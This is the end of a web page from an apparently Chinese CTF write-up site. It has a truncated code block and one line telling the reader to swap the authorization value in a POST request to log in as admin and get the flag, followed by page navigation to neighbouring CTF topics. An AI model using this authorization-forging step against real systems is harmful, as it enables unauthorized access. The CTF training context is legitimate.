</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>将 POST 数据包中的 authorization 内容替换即可以 admin 登录获取 flag</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/ctf/bypass-disable-function.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        bypass-disable-function
      </a></span> <span class="next"><a href="/knowledge/ctf/js-prototype-chain-pollution.html">
        nodejs原型链污染
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/29.6393a40b.js" defer></script>
  </body>
</html>